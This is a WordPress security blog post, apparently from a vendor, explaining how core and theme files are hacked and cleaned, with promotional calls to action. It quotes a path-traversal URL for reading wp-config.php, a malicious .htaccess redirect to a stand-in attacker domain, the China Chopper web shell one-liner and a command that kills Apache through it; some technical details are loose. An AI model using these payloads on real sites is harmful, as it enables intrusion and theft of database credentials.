Wordpress file injection

WordPress is a democratic revolution when it comes to creating and hosting content. This has led to a massive upsurge in its popularity. According to the official WordPress website, it powers around 32% of internet sites. However, at times various WP sites are compromised due to attacks like the wp-config.php hack. Nevertheless, the popularity of WordPress is because of it’s open source structure. Commenting on this, its founder Matt Mullenweg said that.

Two things WordPress has been able to exemplify is that Open Source can create great user experiences and that it’s possible to have a successful commercial entity and a wider free software community living and working in harmony.

However, at times vulnerabilities in WordPress have led to the compromise of thousands of sites. Like the infamous case of The Slider Revolution issue. This was an LFI vulnerability which exposed thewp-config.php file. This led to a wp-config.php hack which we shall discuss in the article. So, before it was patched, thousands of websites had been compromised with SoakSoak.ru malware. The icing on the cake was the Panama leak caused by this issue.

1) WordPress wp-config.php Hack

Wp-config.php is an important file of the WP installation. It acts as a bridge between the WP file system and the MySQL database. Wp-config.php contains the database connection credentials. Apart from this, it can also be used for:

  • Defining the security keys.
  • To specify the database prefix.
  • To set the default language for your admin panel.

Therefore, owing to its sensitive nature, it is a ripe target. In November 2016, a critical flaw was found in the plugin Revolution Image Slider. This was an LFI(Local File Intrusion) injection. By a simple code, the attacker could access the wp-config file. This led to a wp-config.php hack.

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

So basically appending this code after any URL, the wp-config file could be accessed. The  Soaksoak.ru malware actively exploited this. The first step was to access the file to conduct wp-config.php hack. Secondly, a malicious theme is uploaded to the WP site. This installs the Filesman backdoor. Apart from this, theswfobject.js is modified to redirect users.  Thus conducting a WordPress hack via wp-config.

Worried about attacks like wp-config.php hack? Drop us a message on the chat widget and we’d be happy to help you fix it. Secure my WordPress website now.

2) WordPress index.php Hacked

Theindex.php helps in loading the default theme for WP installation. At times it could be difficult to grasp the concept of template hierarchy. So in a layman’s terms, either there should be a  front-page.php file or a home.php file. If neither of them is present, it servesindex.php. In case, there is noindex.php, the directory listing gets enabled. This can expose the sensitive files. Therefore, index.php is appealing to attackers.

For instance, the pub2srv malware targetedindex.php filesResearches at Astra were monitoring this large spread malware redirection campaign. Firstly the website is compromised using an SQL injection. Then, theindex.php is injected with javascript. As a result, users are redirected or pop-ups are displayed. The infectedindex.php files were found injected with a code snippet like this.

wp config php hack

At times updates could cause a problem in.index.php. Often the web admins rename the index files while updating toindex.php.old. So, there are web scanners designed specifically to scan for such files. Once found, it can leak sensitive info to the attackers. The attacker could use this info to compromise the site!

3) WordPress .htaccess Hacked

The .htaccess file helps to modify the way site is accessed. The .htaccess file is a very powerful and versatile component. It contributes to the security of your WP installation. Using this, we can:

  • Restrict access to certain folders of the site.
  • Create Redirects.
  • Force HTTPS.
  • Manage Caching.
  • Prevent a few script injection attacks.
  • Stop bots from finding usernames.
  • Block image hotlinking.
  • Force automatical downloads of a file.
  • Manage file extensions.

However, when under attack these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it’s used to display spam. For instance look at the code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The malicious code in the last line is redirecting the user traffic from the site. The users are redirected tohttp://MaliciousDomain.tld. Then, it tries to load thebad.php script. If you notice unusual redirect from your site, it is most likely due to .htaccess file hack. However, if the file is empty do not panic. The server automatically fills the contents.

WordPress Theme Files Hacked

1) WordPress Footer.php Hacked

The footer area of WordPress is defined by the filefooter.php. This area contains certain widgets which remain the same throughout the website. For example, the share widget or the social media widgets at the bottom of your website. Or at times it could be just copyright info, credits etc. However, due to HTML5’s new methodsfooter.php has become more powerful. Now, the elements of footer can be used not only at the bottom but at other sections of the site as well.

So, footer.php is an important file that can be targeted by the attackers. It is often used for malware redirects and displaying spam content. As was the case of Default7.com Redirect Malware. Thefooter.php was infected with Javascript in the primary stages. However, in the later stagesheader.php was a target. Moreover, the encrypted values for redirect were stored in.SIc7CYwgY or .SIc7CYwgY1 file in the site root. If these locations were unavailable, /var/tmp/.SIc7CYwgY was used.

2) WordPress Header.php Hacked

The header.php files help developers to customize the header image of the theme. Theheader.php was the second target of Default7.com Redirect Malware. However, adding the same functions to footer and header resulted in some errors. The header.php file was modified to insert malicious code. Although the code mostly looked gibberish. But decoding it made things more clear. It basically redirected users to a website. Also, cookies were used to uniquely identify the users. This cookie had a time limit of one year.

Wordpress header.php hack

Moreover, in another instance, the attackers injected JavaScript codes into all files with a .js extension. What makes the detection of malware difficult is that it is a part of the core files!

3) WordPress Functions.php Hacked

The functions file behaves like a plugin. Which means, it can be used to add extra features and functionality to the WordPress site. The filefunctions.php can be used:

  • For calling WordPress functions.
  • To call native PHP functions.
  • Or to define your own functions.

Moreover, the filefunctions.php is present in every theme. But onlyfunctions.php in the active theme affects site rendering. This file was actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages in the site. So, sites showed signs of Pharma and Japanese SEO spam.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As is evident from the code above, this file includes class.theme-modules.php file. This file is then used to install malware into other themes. Thus creating new users and backdoors. This allowed attackers to access the site after the file is cleaned!

Need professional help to remove WordPress file hack? Drop us a message on the chat widget and we’d be happy to help you. Fix my WordPress website now.

4) WordPress wp-load.php Hacked

Thewp-load.php is an important file for every plugin. The filewp-load.php helps in bootstrapping the WordPress environment. So, this gives the plugins ability to use the native WP core functions. Many of the malware variants infect WordPress sites by creating malicious wp-load files. As was seen in the case of China Chopper Web shell malware. The typical behavior was to create files likewp-load-eFtAh.php on the server. The files would contain code like:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code. Which is given by thepass get parameter. Using this further commands could be executed. For instance, the commandhttp://yoursite/your.php?pass=system("killall -9 apache"); could kill the processes. This can shut down the entire server. So, this was a small yet efficient malware which could get complete hold of the server!

WordPress Files Cleanup

1) Cleaning Files

Firstly, investigate the causes of attacks like the wp-config.php hack. Then remove the malicious code. Secondly, restore the infected files from the backup. In case the backup is unavailable use fresh files. However, ensure that a backup copy is present all the times.

2) Secure Using Plugins

At times the site may fall prey to automation. An automatic brute force attack can compromise the admin panel. So the AG Custom Admin plugin can help in hiding this page. It renames the login panel to a keyword of user choice. Moreover, certain plugins can block the username enumeration.

3) Hiding Files

Often, exposing files can reveal sensitive info. This could lead to a wp-config.php hack. Therefore, it becomes necessary to hide these files on the server. So, the .htaccess file can help in securing these files. To hide WP-content/uploads add the following code o your .htaccess file.

Order Allow,Deny
Deny from all
Allow from all

To hide wp-includes add this to the .htaccess file:

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

Also, the Hide WP plugin can help in hiding the content of a WordPress site. Making it hard for attackers to identify and exploit!

4) Updating

Always ensure that the WP installation is up to date. Most of the loopholes can be plugged by running an updated installation. Use the reputed plugins and themes only. Avoid poorly coded or null themes. Moreover, update the plugins regularly along with core installation. Thus keeping attacks like the wp-config.php hack at bay.

5) Firewall

A firewall goes a long way in securing your site. The firewall can monitor the incoming traffic and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra is flexible and suitable for your needs.

How Web Application Firewall works
How Astra Web Application Firewall protects you

The Astra firewall can detect infections and remove them. Apart from that, all the vulnerabilities will be automatically plugged.

6) WordPress Security Audit or Pentesting

With WordPress being the most popular CMS in usage and the resulting increase in security issues associated with it, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, Pen-Testing a WordPress site has become essential in order to keep it secure from attacks. Penetration Testing is a simulated attack performed against a web application, network or a computer system to evaluate its security and find any vulnerabilities it has before an attacker could exploit them. One of the different simulated attacks carried out while Pen-Testing a WordPress site would be to check for Directory Listing vulnerability that basically indexes sensitive directories such as wp-includes, wp-index.php,  wp-config.php, wp-admin, wp-load.php, wp-content etc. and could thus provide an attacker with sensitive information.

Astra provides a comprehensive security audit for your website with 80+ active tests, a right mix of automated & manual testing.

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close